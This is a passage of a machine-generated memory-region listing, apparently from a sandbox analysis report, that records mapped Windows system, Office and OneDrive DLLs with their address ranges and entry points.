mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1792 start_va = 0x7fef9150000 end_va = 0x7fef915bfff monitored = 0 entry_point = 0x7fef9151070 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 1793 start_va = 0x7fef9160000 end_va = 0x7fef91ddfff monitored = 0 entry_point = 0x7fef9161304 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 1794 start_va = 0x7fef91e0000 end_va = 0x7fef9214fff monitored = 0 entry_point = 0x7fef91ec59c region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 1795 start_va = 0x7fef9220000 end_va = 0x7fef9a9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 1796 start_va = 0x7fef9aa0000 end_va = 0x7fef9c58fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 1797 start_va = 0x7fef9c60000 end_va = 0x7fef9f75fff monitored = 0 entry_point = 0x7fef9c63e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1798 start_va = 0x7fef9f80000 end_va = 0x7fef9f82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 1799 start_va = 0x7fef9f90000 end_va = 0x7fef9f92fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 1800 start_va = 0x7fef9fa0000 end_va = 0x7fef9fa2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 1801 start_va = 0x7fef9fb0000 end_va = 0x7fef9fb2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 1802 start_va = 0x7fef9fc0000 end_va = 0x7fef9fc4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 1803 start_va = 0x7fef9fd0000 end_va = 0x7fef9fd4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 1804 start_va = 0x7fef9fe0000 end_va = 0x7fef9fe2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 1805 start_va = 0x7fef9ff0000 end_va = 0x7fefa08dfff monitored = 0 entry_point = 0x7fefa039d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 1806 start_va = 0x7fefa090000 end_va = 0x7fefa093fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 1807 start_va = 0x7fefa0a0000 end_va = 0x7fefa0a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 1808 start_va = 0x7fefa0b0000 end_va = 0x7fefa0b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 1809 start_va = 0x7fefa0c0000 end_va = 0x7fefa0c3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 1810 start_va = 0x7fefa0d0000 end_va = 0x7fefa0d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 1811 start_va = 0x7fefa0e0000 end_va = 0x7fefa0e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 1812 start_va = 0x7fefa0f0000 end_va = 0x7fefa0f2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1813 start_va = 0x7fefa100000 end_va = 0x7fefa102fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 1814 start_va = 0x7fefa110000 end_va = 0x7fefa112fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 1815 start_va = 0x7fefa120000 end_va = 0x7fefa122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 1816 start_va = 0x7fefa130000 end_va = 0x7fefa221fff monitored = 0 entry_point = 0x7fefa139060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1817 start_va = 0x7fefa230000 end_va = 0x7fefa233fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 1818 start_va = 0x7fefa240000 end_va = 0x7fefa256fff monitored = 0 entry_point = 0x7fefa24c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 1819 start_va = 0x7fefa260000 end_va = 0x7fefa473fff monitored = 0 entry_point = 0x7fefa261000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 1820 start_va = 0x7fefa480000 end_va = 0x7fefa54dfff monitored = 0 entry_point = 0x7fefa4a30fc region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll") Region: id = 1821 start_va = 0x7fefa550000 end_va = 0x7fefa5f6fff monitored = 0 entry_point = 0x7fefa59b93c region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll") Region: id = 1822 start_va = 0x7fefa600000 end_va = 0x7fefa655fff monitored = 0 entry_point = 0x7fefa6086e8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll") Region: id = 1823 start_va = 0x7fefa660000 end_va = 0x7fefa6b6fff monitored = 0 entry_point = 0x7fefa661118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1824 start_va = 0x7fefa6c0000 end_va = 0x7fefa889fff monitored = 0 entry_point = 0x7fefa6c7a60 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 1825 start_va = 0x7fefac30000 end_va = 0x7fefac47fff monitored = 0 entry_point = 0x7fefac31010 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1826 start_va = 0x7fefae70000 end_va = 0x7fefae87fff monitored = 0 entry_point = 0x7fefae71bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1827 start_va = 0x7fefae90000 end_va = 0x7fefaea0fff monitored = 0 entry_point = 0x7fefae916ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1828 start_va = 0x7fefaeb0000 end_va = 0x7fefaecffff monitored = 0 entry_point = 0x7fefaeb1298 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 1829 start_va = 0x7fefaf70000 end_va = 0x7fefaf76fff monitored = 0 entry_point = 0x7fefaf71b24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 1830 start_va = 0x7fefaf80000 end_va = 0x7fefaf8ffff monitored = 0 entry_point = 0x7fefaf895dc region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 1831 start_va = 0x7fefaf90000 end_va = 0x7fefaf9afff monitored = 0 entry_point = 0x7fefaf91030 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 1832 start_va = 0x7fefafa0000 end_va = 0x7fefafb5fff monitored = 0 entry_point = 0x7fefafa1050 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 1833 start_va = 0x7fefafc0000 end_va = 0x7fefb002fff monitored = 0 entry_point = 0x7fefafc30d8 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 1834 start_va = 0x7fefb110000 end_va = 0x7fefb11afff monitored = 0 entry_point = 0x7fefb111198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1835 start_va = 0x7fefb120000 end_va = 0x7fefb146fff monitored = 0 entry_point = 0x7fefb1298bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1836 start_va = 0x7fefb150000 end_va = 0x7fefb1b6fff monitored = 0 entry_point = 0x7fefb166060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1837 start_va = 0x7fefb1d0000 end_va = 0x7fefb1dafff monitored = 0 entry_point = 0x7fefb1d4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1838 start_va = 0x7fefb200000 end_va = 0x7fefb218fff monitored = 0 entry_point = 0x7fefb2011a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1839 start_va = 0x7fefb2a0000 end_va = 0x7fefb2b4fff monitored = 0 entry_point = 0x7fefb2a60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1840 start_va = 0x7fefb390000 end_va = 0x7fefb4b6fff monitored = 0 entry_point = 0x7fefb3910ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1841 start_va = 0x7fefb5b0000 end_va = 0x7fefb5bafff monitored = 0 entry_point = 0x7fefb5b5740 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 1842 start_va = 0x7fefb5c0000 end_va = 0x7fefb5c8fff monitored = 0 entry_point = 0x7fefb5c1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1843 start_va = 0x7fefb5d0000 end_va = 0x7fefb5fbfff monitored = 0 entry_point = 0x7fefb5d15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1844 start_va = 0x7fefb6b0000 end_va = 0x7fefb6dcfff monitored = 0 entry_point = 0x7fefb6b1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1845 start_va = 0x7fefb830000 end_va = 0x7fefb843fff monitored = 0 entry_point = 0x7fefb8316b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1846 start_va = 0x7fefb850000 end_va = 0x7fefb864fff monitored = 0 entry_point = 0x7fefb851050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1847 start_va = 0x7fefb870000 end_va = 0x7fefb87bfff monitored = 0 entry_point = 0x7fefb8718a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1848 start_va = 0x7fefb9b0000 end_va = 0x7fefb9c0fff monitored = 0 entry_point = 0x7fefb9b1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1849 start_va = 0x7fefb9e0000 end_va = 0x7fefbb09fff monitored = 0 entry_point = 0x7fefb9e3810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1850 start_va = 0x7fefbb10000 end_va = 0x7fefbb44fff monitored = 0 entry_point = 0x7fefbb11064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1851 start_va = 0x7fefbb50000 end_va = 0x7fefbb67fff monitored = 0 entry_point = 0x7fefbb51130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1852 start_va = 0x7fefbb70000 end_va = 0x7fefbbbafff monitored = 0 entry_point = 0x7fefbb7efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1853 start_va = 0x7fefbbc0000 end_va = 0x7fefbbcafff monitored = 0 entry_point = 0x7fefbbc1020 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1854 start_va = 0x7fefbbd0000 end_va = 0x7fefbc0afff monitored = 0 entry_point = 0x7fefbbdf410 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 1855 start_va = 0x7fefbc10000 end_va = 0x7fefbc52fff monitored = 0 entry_point = 0x7fefbc1c168 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 1856 start_va = 0x7fefbc60000 end_va = 0x7fefbd51fff monitored = 0 entry_point = 0x7fefbc8ac20 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 1857 start_va = 0x7fefbd60000 end_va = 0x7fefbf74fff monitored = 0 entry_point = 0x7fefbf364b0 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 1858 start_va = 0x7fefbf80000 end_va = 0x7fefbfd5fff monitored = 0 entry_point = 0x7fefbf8bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1859 start_va = 0x7fefbfe0000 end_va = 0x7fefc10bfff monitored = 0 entry_point = 0x7fefbfe94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1860 start_va = 0x7fefc110000 end_va = 0x7fefc12cfff monitored = 0 entry_point = 0x7fefc111ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1861 start_va = 0x7fefc130000 end_va = 0x7fefc153fff monitored = 0 entry_point = 0x7fefc131024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1862 start_va = 0x7fefc160000 end_va = 0x7fefc353fff monitored = 0 entry_point = 0x7fefc2ec924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1863 start_va = 0x7fefc360000 end_va = 0x7fefc469fff monitored = 0 entry_point = 0x7fefc361010 region_type = mapped_file name = "cryptui.dll" filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll") Region: id = 1864 start_va = 0x7fefc470000 end_va = 0x7fefc649fff monitored = 0 entry_point = 0x7fefc473130 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 1865 start_va = 0x7fefc7f0000 end_va = 0x7fefc7fbfff monitored = 0 entry_point = 0x7fefc7f1064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1866 start_va = 0x7fefc9d0000 end_va = 0x7fefc9edfff monitored = 0 entry_point = 0x7fefc9d13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1867 start_va = 0x7fefcc20000 end_va = 0x7fefcc66fff monitored = 0 entry_point = 0x7fefcc21064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1868 start_va = 0x7fefcf20000 end_va = 0x7fefcf37fff monitored = 0 entry_point = 0x7fefcf23b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1869 start_va = 0x7fefd030000 end_va = 0x7fefd061fff monitored = 0 entry_point = 0x7fefd03144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1870 start_va = 0x7fefd150000 end_va = 0x7fefd1bcfff monitored = 0 entry_point = 0x7fefd151010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1871 start_va = 0x7fefd420000 end_va = 0x7fefd442fff monitored = 0 entry_point = 0x7fefd421198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1872 start_va = 0x7fefd4c0000 end_va = 0x7fefd4cafff monitored = 0 entry_point = 0x7fefd4c1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1873 start_va = 0x7fefd4f0000 end_va = 0x7fefd514fff monitored = 0 entry_point = 0x7fefd4f9658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1874 start_va = 0x7fefd520000 end_va = 0x7fefd52efff monitored = 0 entry_point = 0x7fefd521010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1875 start_va = 0x7fefd530000 end_va = 0x7fefd5c0fff monitored = 0 entry_point = 0x7fefd531440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1876 start_va = 0x7fefd5d0000 end_va = 0x7fefd60cfff monitored = 0 entry_point = 0x7fefd5d18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1877 start_va = 0x7fefd610000 end_va = 0x7fefd623fff monitored = 0 entry_point = 0x7fefd6110e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1878 start_va = 0x7fefd630000 end_va = 0x7fefd63efff monitored = 0 entry_point = 0x7fefd6319b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1879 start_va = 0x7fefd6d0000 end_va = 0x7fefd6defff monitored = 0 entry_point = 0x7fefd6d1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1880 start_va = 0x7fefd6e0000 end_va = 0x7fefd6f9fff monitored = 0 entry_point = 0x7fefd6e1558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1881 start_va = 0x7fefd700000 end_va = 0x7fefd735fff monitored = 0 entry_point = 0x7fefd701474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1882 start_va = 0x7fefd7e0000 end_va = 0x7fefd84bfff monitored = 0 entry_point = 0x7fefd7e2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1883 start_va = 0x7fefd850000 end_va = 0x7fefd9bcfff monitored = 0 entry_point = 0x7fefd8510b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1884 start_va = 0x7fefd9c0000 end_va = 0x7fefd9fafff monitored = 0 entry_point = 0x7fefd9c1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1885 start_va = 0x7fefda00000 end_va = 0x7fefdb2cfff monitored = 0 entry_point = 0x7fefda4ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1886 